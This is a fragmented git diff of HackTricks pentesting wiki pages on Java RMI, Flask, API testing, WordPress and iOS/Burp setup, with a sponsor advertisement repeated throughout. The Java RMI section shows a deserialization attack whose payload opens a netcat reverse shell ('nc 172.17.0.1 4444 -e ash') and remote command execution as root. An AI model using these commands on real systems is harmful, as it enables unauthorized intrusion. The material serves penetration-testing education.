@@ -105,7 +112,7 @@ In _Proxy_ --> _Options_ --> _Export CA certificate_ --> _Certificate in DER for
**The iOS simulator will use the proxy configurations of the MacOS.**
{% endhint %}
-## MacOS Proxy Configuration
+### MacOS Proxy Configuration
Steps to configure Burp as proxy:
@@ -117,6 +124,13 @@ Steps to configure Burp as proxy:
* Click on _**Ok**_ and the in _**Apply**_
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
-# Basic Information
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
-*Java Remote Method Invocation*, or *Java RMI*, is an object oriented *RPC* mechanism that allows an object
-located in one *Java virtual machine* to call methods on an object located in another *Java virtual machine*.
-This enables developers to write distributed applications using an object-oriented paradigm. A short introduction
-to *Java RMI* from an offensive perspective can be found in [this blackhat talk](https://youtu.be/t_aw1mDNhzI?t=202).
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+## Basic Information
+
+_Java Remote Method Invocation_, or _Java RMI_, is an object oriented _RPC_ mechanism that allows an object located in one _Java virtual machine_ to call methods on an object located in another _Java virtual machine_. This enables developers to write distributed applications using an object-oriented paradigm. A short introduction to _Java RMI_ from an offensive perspective can be found in [this blackhat talk](https://youtu.be/t\_aw1mDNhzI?t=202).
**Default port:** 1090,1098,1099,1199,4443-4446,8999-9010,9999
-```text
+```
PORT STATE SERVICE VERSION
1090/tcp open ssl/java-rmi Java RMI
9010/tcp open java-rmi Java RMI
@@ -34,38 +38,20 @@ PORT STATE SERVICE VERSION
40259/tcp open ssl/java-rmi Java RMI
```
-Usually, only the default *Java RMI* components (the *RMI Registry* and the *Activation System*) are bound to
-common ports. The *remote objects* that implement the actual *RMI* application are usually bound to random ports
-as shown in the output above.
+Usually, only the default _Java RMI_ components (the _RMI Registry_ and the _Activation System_) are bound to common ports. The _remote objects_ that implement the actual _RMI_ application are usually bound to random ports as shown in the output above.
-*nmap* has sometimes troubles identifying *SSL* protected *RMI* services. If you encounter an unknown ssl service on
-a common *RMI* port, you should further investigate.
+_nmap_ has sometimes troubles identifying _SSL_ protected _RMI_ services. If you encounter an unknown ssl service on a common _RMI_ port, you should further investigate.
+## RMI Components
-# RMI Components
+To put it in simple terms, _Java RMI_ allows a developer to make a _Java object_ available on the network. This opens up a _TCP_ port where clients can connect and call methods on the corresponding object. Despite this sounds simple, there are several challenges that _Java RMI_ needs to solve:
-To put it in simple terms, *Java RMI* allows a developer to make a *Java object* available on the network. This opens
-up a *TCP* port where clients can connect and call methods on the corresponding object. Despite this sounds simple,
-there are several challenges that *Java RMI* needs to solve:
+1. To dispatch a method call via _Java RMI_, clients need to know the IP address, the listening port, the implemented class or interface and the `ObjID` of the targeted object (the `ObjID` is a unique and random identifier that is created when the object is made available on the network. It is required because _Java RMI_ allows multiple objects to listen on the same _TCP_ port).
+2. Remote clients may allocate resources on the server by invoking methods on the exposed object. The _Java virtual machine_ needs to track which of these resources are still in use and which of them can be garbage collected.
-1. To dispatch a method call via *Java RMI*, clients need to know the IP address, the listening port, the implemented
- class or interface and the ``ObjID`` of the targeted object (the ``ObjID`` is a unique and random identifier that
- is created when the object is made available on the network. It is required because *Java RMI* allows multiple
- objects to listen on the same *TCP* port).
-2. Remote clients may allocate resources on the server by invoking methods on the exposed object. The *Java virtual
- machine* needs to track which of these resources are still in use and which of them can be garbage collected.
+The first challenge is solved by the _RMI registry_, which is basically a naming service for _Java RMI_. The _RMI registry_ itself is also an _RMI service_, but the implemented interface and the `ObjID` are fixed and known by all _RMI_ clients. This allows _RMI_ clients to consume the _RMI_ registry just by knowing the corresponding _TCP_ port.
-The first challenge is solved by the *RMI registry*, which is basically a naming service for *Java RMI*. The *RMI
-registry* itself is also an *RMI service*, but the implemented interface and the ``ObjID`` are fixed and known by
-all *RMI* clients. This allows *RMI* clients to consume the *RMI* registry just by knowing the corresponding *TCP*
-port.
-
-When developers want to make their *Java objects* available within the network, they usually bind them to an *RMI registry*.
-The *registry* stores all information required to connect to the object (IP address, listening port, implemented class or
-interface and the ``ObjID`` value) and makes it available under a human readable name (the *bound name*). Clients that want
-to consume the *RMI service* ask the *RMI registry* for the corresponding *bound name* and the registry returns all required
-information to connect. Thus, the situation is basically the same as with an ordinary *DNS* service. The following listing
-shows a small example:
+When developers want to make their _Java objects_ available within the network, they usually bind them to an _RMI registry_. The _registry_ stores all information required to connect to the object (IP address, listening port, implemented class or interface and the `ObjID` value) and makes it available under a human readable name (the _bound name_). Clients that want to consume the _RMI service_ ask the _RMI registry_ for the corresponding _bound name_ and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary _DNS_ service. The following listing shows a small example:
```java
import java.rmi.registry.Registry;
@@ -91,30 +77,21 @@ public class ExampleClient {
}
```
-The second of the above mentioned challenges is solved by the *Distributed Garbage Collector* (*DGC*). This is another
-*RMI service* with a well known ``ObjID`` value and it is available on basically each *RMI endpoint*. When an *RMI client*
-starts to use an *RMI service*, it sends an information to the *DGC* that the corresponding *remote object* is in use.
-The *DGC* can then track the reference count and is able to cleanup unused objects.
+The second of the above mentioned challenges is solved by the _Distributed Garbage Collector_ (_DGC_). This is another _RMI service_ with a well known `ObjID` value and it is available on basically each _RMI endpoint_. When an _RMI client_ starts to use an _RMI service_, it sends an information to the _DGC_ that the corresponding _remote object_ is in use. The _DGC_ can then track the reference count and is able to cleanup unused objects.
-Together with the deprecated *Activation System*, these are the three default components of *Java RMI*:
+Together with the deprecated _Activation System_, these are the three default components of _Java RMI_:
-1. The *RMI Registry* (``ObjID = 0``)
-2. The *Activation System* (``ObjID = 1``)
-3. The *Distributed Garbage Collector* (``ObjID = 2``)
+1. The _RMI Registry_ (`ObjID = 0`)
+2. The _Activation System_ (`ObjID = 1`)
+3. The _Distributed Garbage Collector_ (`ObjID = 2`)
-The default components of *Java RMI* have been known attack vectors for quite some time and multiple vulnerabilities
-exist in outdated *Java* versions. From an attacker perspective, these default components are interisting, because
-they implemented known classes / interfaces and it is easily possible to interact with them.
-This situation is different for custom *RMI services*. To call a method on a *remote object*, you need to know the corresponding
-method signature in advance. Without knowing an existing method signature, there is no way to communicate to a *RMI service*.
+The default components of _Java RMI_ have been known attack vectors for quite some time and multiple vulnerabilities exist in outdated _Java_ versions. From an attacker perspective, these default components are interisting, because they implemented known classes / interfaces and it is easily possible to interact with them. This situation is different for custom _RMI services_. To call a method on a _remote object_, you need to know the corresponding method signature in advance. Without knowing an existing method signature, there is no way to communicate to a _RMI service_.
+## RMI Enumeration
-# RMI Enumeration
+[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) is a _Java RMI_ vulnerability scanner that is capable of identifying common _RMI vulnerabilities_ automatically. Whenever you identify an _RMI_ endpoint, you should give it a try:
-[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) is a *Java RMI* vulnerability scanner that is capable
-of identifying common *RMI vulnerabilities* automatically. Whenever you identify an *RMI* endpoint, you should give it a try:
-
-```console
+```
$ rmg enum 172.17.0.2 9010
[+] RMI registry bound names:
[+]
@@ -174,13 +151,11 @@ $ rmg enum 172.17.0.2 9010
[+] --> Client codebase enabled - Configuration Status: Non Default
```
-The output of the enumeration action is explained in more detail in the [documentation pages](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action)
-of the project. Depending on the outcome, you should try to verify identified vulnerabilities.
+The output of the enumeration action is explained in more detail in the [documentation pages](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/actions.md#enum-action) of the project. Depending on the outcome, you should try to verify identified vulnerabilities.
-The ``ObjID`` values displayed by *remote-method-guesser* can be used to determine the uptime of the service.
-This may allows to identify other vulnerabilities:
+The `ObjID` values displayed by _remote-method-guesser_ can be used to determine the uptime of the service. This may allows to identify other vulnerabilities:
-```console
+```
$ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+]
@@ -191,18 +166,13 @@ $ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Count: -32760
```
-# Bruteforcing Remote Methods
+## Bruteforcing Remote Methods
-Even when no vulnerabilities have been identified during enumeration, the available *RMI* services
-could still expose dangerous functions. Furthermore, despite *RMI* communication to *RMI* default
-components is protected by deserialization filters, when talking to custom *RMI* services, such filters are
-usually not in place. Knowing valid method signatures on *RMI* services is therefore valuable.
+Even when no vulnerabilities have been identified during enumeration, the available _RMI_ services could still expose dangerous functions. Furthermore, despite _RMI_ communication to _RMI_ default components is protected by deserialization filters, when talking to custom _RMI_ services, such filters are usually not in place. Knowing valid method signatures on _RMI_ services is therefore valuable.
-Unfortunately, *Java RMI* does not support enumerating methods on *remote objects*. That being said,
-it is possible to bruteforce method signatures with tools like [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
-or [rmiscout](https://github.com/BishopFox/rmiscout):
+Unfortunately, _Java RMI_ does not support enumerating methods on _remote objects_. That being said, it is possible to bruteforce method signatures with tools like [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) or [rmiscout](https://github.com/BishopFox/rmiscout):
-```console
+```
$ rmg guess 172.17.0.2 9010
[+] Reading method candidates from internal wordlist rmg.txt
[+] 752 methods were successfully parsed.
@@ -234,14 +204,14 @@ $ rmg guess 172.17.0.2 9010
Identified methods can be called like this:
-```console
+```
$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar
[+] uid=0(root) gid=0(root) groups=0(root)
```
Or you can perform deserialization attacks like this:
-```console
+```
$ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"
[+] Creating ysoserial payload... done.
[+]
@@ -266,23 +236,18 @@ uid=0(root) gid=0(root) groups=0(root)
More information can be found in these articles:
-* [Attacking Java RMI services after JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)
-* [Method Guessing](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md)
+* [Attacking Java RMI services after JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)
+* [Method Guessing](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md)
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://bishopfox.com/blog/rmiscout)
-Apart from guessing, you should also look in search engines or *GitHub* for the interface or even the
-implementation of an encountered *RMI* service. The *bound name* and the name of the implemented class or interface
-can be helpful here.
+Apart from guessing, you should also look in search engines or _GitHub_ for the interface or even the implementation of an encountered _RMI_ service. The _bound name_ and the name of the implemented class or interface can be helpful here.
+## Known Interfaces
-# Known Interfaces
+[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) marks classes or interfaces as `known` if they are listed in the tool's internal database of known _RMI services_. In these cases you can use the `known` action to get more information on the corresponding _RMI service_:
-[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) marks classes or interfaces as ``known`` if they
-are listed in the tool's internal database of known *RMI services*. In these cases you can use the ``known`` action to get
-more information on the corresponding *RMI service*:
-
-```console
+```
$ rmg enum 172.17.0.2 1090 | head -n 5
[+] RMI registry bound names:
[+]
@@ -341,21 +306,19 @@ $ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
[+] - https://github.com/qtc-de/beanshooter
```
-# Shodan
+## Shodan
* `port:1099 java`
-
-# Tools
+## Tools
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://github.com/BishopFox/rmiscout)
* [BaRMIe](https://github.com/NickstaDB/BaRMIe)
+## HackTricks Automatic Commands
-# HackTricks Automatic Commands
-
-```text
+```
Protocol_Name: Java RMI #Protocol Abbreviation if there is one.
Port_Number: 1090,1098,1099,1199,4443-4446,8999-9010,9999 #Comma separated if there is more than one.
Protocol_Description: Java Remote Method Invocation #Protocol Abbreviation Spelled out
@@ -366,7 +329,13 @@ Entry_1:
Command: rmg enum {IP} {PORT}
```
+{% hint style="danger" %}
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+****
+
**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**
## Cookies
@@ -74,6 +84,14 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## Basic Information
Main:
@@ -123,6 +131,14 @@ Old versions may be still be in use and be more vulnerable than latest endpoints
* `/api/CharityEventFeb2020/user/pp/`
* `/api/CharityEventFeb2021/user/pp/`
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## 🛡️ API Security Empire Cheat Sheet
\
@@ -139,9 +155,6 @@ The first gate to enter the API Security Empire is to know how to gather informa
[**PDF Version**](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap.pdf) **|** [**XMind Version**](https://github.com/Cyber-Guy1/API-SecurityEmpire/blob/main/assets/API%20Pentesting%20Mindmap.xmind)
-\
-
-
#### ⚔️ Weapons you will need:
* [BurpSuite](https://portswigger.net/burp/releases)
@@ -195,6 +208,14 @@ Read this document to learn how to **search** and **exploit** Owasp Top 10 API v
* [**https://github.com/flipkart-incubator/Astra**](https://github.com/flipkart-incubator/Astra): Another tool for api testing
* [**https://github.com/assetnote/kiterunner**](https://github.com/assetnote/kiterunner): Great tool to **discover API endpoints**
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## Basic Information
**Uploaded** files go to: _http://10.10.10.10/wp-content/uploads/2018/08/a.txt_\
@@ -93,6 +99,14 @@ curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-conten
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## Active enumeration
### Plugins and Themes
@@ -277,6 +291,14 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
#You can try to bruteforce the admin user using wpscan with "-U admin"
```
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## **Panel RCE**
**Modifying a php from the theme used (admin credentials needed)**
@@ -404,7 +426,13 @@ Also, **only install trustable WordPress plugins and themes**.
* **Limit login attempts** to prevent Brute Force attacks
* Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
-##
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## Data Storage
To learn about how iOS stores data in the device read this page:
@@ -734,6 +750,14 @@ Jun 7 13:42:14 iPhone touch[9708]
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
## Backups
iOS includes auto-backup features that create copies of the data stored on the device. You can **make iOS backups** from your host computer by using iTunes (till macOS Catalina) or Finder (from macOS Catalina onwards), or via the iCloud backup feature. In both cases, the backup includes nearly all data stored on the iOS device except highly sensitive data such as Apple Pay information and Touch ID settings.
@@ -1152,6 +1176,14 @@ You can find the **libraries used by an application** by running **`otool`** aga
* [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS)
* [https://github.com/nabla-c0d3/ssl-kill-switch2](https://github.com/nabla-c0d3/ssl-kill-switch2)
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
Support HackTricks and get benefits!
diff --git a/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md b/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md index f7816ba72..12b9351cf 100644 --- a/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md +++ b/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md @@ -1,4 +1,4 @@ - +# Burp Suite Configuration for iOS
@@ -16,24 +16,31 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %}
+
-# Burp Cert Installation in physical iOS
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+## Burp Cert Installation in physical iOS
You can install [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing) **for help installing the Burp Certificate, configure the proxy and perform SSL Pinning.**\
Or you can manually follow the next steps:
-* Configure **Burp** as the iPhone **proxy in **_**Settings**_** --> **_**Wifi**_** --> **_**Click the network**_** --> **_**Proxy**_
+* Configure **Burp** as the iPhone **proxy in \_Settings**_\*\* --> \*\*_**Wifi**_\*\* --> \*\*_**Click the network**_\*\* --> \*\*_**Proxy**\_
* Access `http://burp` and download the certificate
* Access _**Setting**_ --> _**Profile Downloaded**_ and **Install** it (you will be asked your code)
* Access _**Settings**_ --> _**General**_ --> _**About**_ --> _**Certificate Trust Settings**_ and enable PortSwigger CA
-## Setting up an Interception Proxy via localhost
+### Setting up an Interception Proxy via localhost
Setting up Burp to proxy your traffic is pretty straightforward. We assume that both your iOS device and host computer are connected to a Wi-Fi network that permits client-to-client traffic. If client-to-client traffic is not permitted, you can use usbmuxd to connect to Burp via USB.
PortSwigger provides a good [tutorial on setting up an iOS device to work with Burp](https://support.portswigger.net/customer/portal/articles/1841108-configuring-an-ios-device-to-work-with-burp) and a [tutorial on installing Burp's CA certificate to an iOS device](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device).
-### Using Burp via USB on a Jailbroken Device
+#### Using Burp via USB on a Jailbroken Device
When doing dynamic analysis, it's interesting to use the SSH connection to route our traffic to Burp that is running on our computer. Let's get started:
@@ -61,7 +68,7 @@ The last step would be to set the proxy globally on your iOS device:
5. Type in 127.0.0.1 as **Server**
6. Type in 8080 as **Port**
-## Full Network Monitoring/Sniffing
+### Full Network Monitoring/Sniffing
If you need to **monitor something different from HTTP communications** you can sniff all the device traffic with **wireshark**.\
You can remotely sniff all traffic in real-time on iOS by [creating a Remote Virtual Interface](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819) for your iOS device. First make sure you have **Wireshark** **installed** on your macOS host computer.
@@ -85,7 +92,7 @@ ip.addr == 192.168.1.1 && http
The documentation of Wireshark offers many examples for [Capture Filters](https://wiki.wireshark.org/CaptureFilters) that should help you to filter the traffic to get the information you want.
-# Burp Cert Installation in Simulator
+## Burp Cert Installation in Simulator
* **Export Burp Certificate**
@@ -105,7 +112,7 @@ In _Proxy_ --> _Options_ --> _Export CA certificate_ --> _Certificate in DER for
**The iOS simulator will use the proxy configurations of the MacOS.**
{% endhint %}
-## MacOS Proxy Configuration
+### MacOS Proxy Configuration
Steps to configure Burp as proxy:
@@ -117,6 +124,13 @@ Steps to configure Burp as proxy:
* Click on _**Ok**_ and the in _**Apply**_
+{% hint style="danger" %}
+
+
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
+
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
@@ -133,5 +147,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/network-services-pentesting/1099-pentesting-java-rmi.md b/network-services-pentesting/1099-pentesting-java-rmi.md
index df26000ed..e8e28cc17 100644
--- a/network-services-pentesting/1099-pentesting-java-rmi.md
+++ b/network-services-pentesting/1099-pentesting-java-rmi.md
@@ -1,4 +1,4 @@
-
+# 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP
@@ -16,17 +16,21 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %}
+
-# Basic Information
+Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
-*Java Remote Method Invocation*, or *Java RMI*, is an object oriented *RPC* mechanism that allows an object
-located in one *Java virtual machine* to call methods on an object located in another *Java virtual machine*.
-This enables developers to write distributed applications using an object-oriented paradigm. A short introduction
-to *Java RMI* from an offensive perspective can be found in [this blackhat talk](https://youtu.be/t_aw1mDNhzI?t=202).
+{% embed url="https://securityhubs.io/" %}
+{% endhint %}
+
+## Basic Information
+
+_Java Remote Method Invocation_, or _Java RMI_, is an object oriented _RPC_ mechanism that allows an object located in one _Java virtual machine_ to call methods on an object located in another _Java virtual machine_. This enables developers to write distributed applications using an object-oriented paradigm. A short introduction to _Java RMI_ from an offensive perspective can be found in [this blackhat talk](https://youtu.be/t\_aw1mDNhzI?t=202).
**Default port:** 1090,1098,1099,1199,4443-4446,8999-9010,9999
-```text
+```
PORT STATE SERVICE VERSION
1090/tcp open ssl/java-rmi Java RMI
9010/tcp open java-rmi Java RMI
@@ -34,38 +38,20 @@ PORT STATE SERVICE VERSION
40259/tcp open ssl/java-rmi Java RMI
```
-Usually, only the default *Java RMI* components (the *RMI Registry* and the *Activation System*) are bound to
-common ports. The *remote objects* that implement the actual *RMI* application are usually bound to random ports
-as shown in the output above.
+Usually, only the default _Java RMI_ components (the _RMI Registry_ and the _Activation System_) are bound to common ports. The _remote objects_ that implement the actual _RMI_ application are usually bound to random ports as shown in the output above.
-*nmap* has sometimes troubles identifying *SSL* protected *RMI* services. If you encounter an unknown ssl service on
-a common *RMI* port, you should further investigate.
+_nmap_ has sometimes troubles identifying _SSL_ protected _RMI_ services. If you encounter an unknown ssl service on a common _RMI_ port, you should further investigate.
+## RMI Components
-# RMI Components
+To put it in simple terms, _Java RMI_ allows a developer to make a _Java object_ available on the network. This opens up a _TCP_ port where clients can connect and call methods on the corresponding object. Despite this sounds simple, there are several challenges that _Java RMI_ needs to solve:
-To put it in simple terms, *Java RMI* allows a developer to make a *Java object* available on the network. This opens
-up a *TCP* port where clients can connect and call methods on the corresponding object. Despite this sounds simple,
-there are several challenges that *Java RMI* needs to solve:
+1. To dispatch a method call via _Java RMI_, clients need to know the IP address, the listening port, the implemented class or interface and the `ObjID` of the targeted object (the `ObjID` is a unique and random identifier that is created when the object is made available on the network. It is required because _Java RMI_ allows multiple objects to listen on the same _TCP_ port).
+2. Remote clients may allocate resources on the server by invoking methods on the exposed object. The _Java virtual machine_ needs to track which of these resources are still in use and which of them can be garbage collected.
-1. To dispatch a method call via *Java RMI*, clients need to know the IP address, the listening port, the implemented
- class or interface and the ``ObjID`` of the targeted object (the ``ObjID`` is a unique and random identifier that
- is created when the object is made available on the network. It is required because *Java RMI* allows multiple
- objects to listen on the same *TCP* port).
-2. Remote clients may allocate resources on the server by invoking methods on the exposed object. The *Java virtual
- machine* needs to track which of these resources are still in use and which of them can be garbage collected.
+The first challenge is solved by the _RMI registry_, which is basically a naming service for _Java RMI_. The _RMI registry_ itself is also an _RMI service_, but the implemented interface and the `ObjID` are fixed and known by all _RMI_ clients. This allows _RMI_ clients to consume the _RMI_ registry just by knowing the corresponding _TCP_ port.
-The first challenge is solved by the *RMI registry*, which is basically a naming service for *Java RMI*. The *RMI
-registry* itself is also an *RMI service*, but the implemented interface and the ``ObjID`` are fixed and known by
-all *RMI* clients. This allows *RMI* clients to consume the *RMI* registry just by knowing the corresponding *TCP*
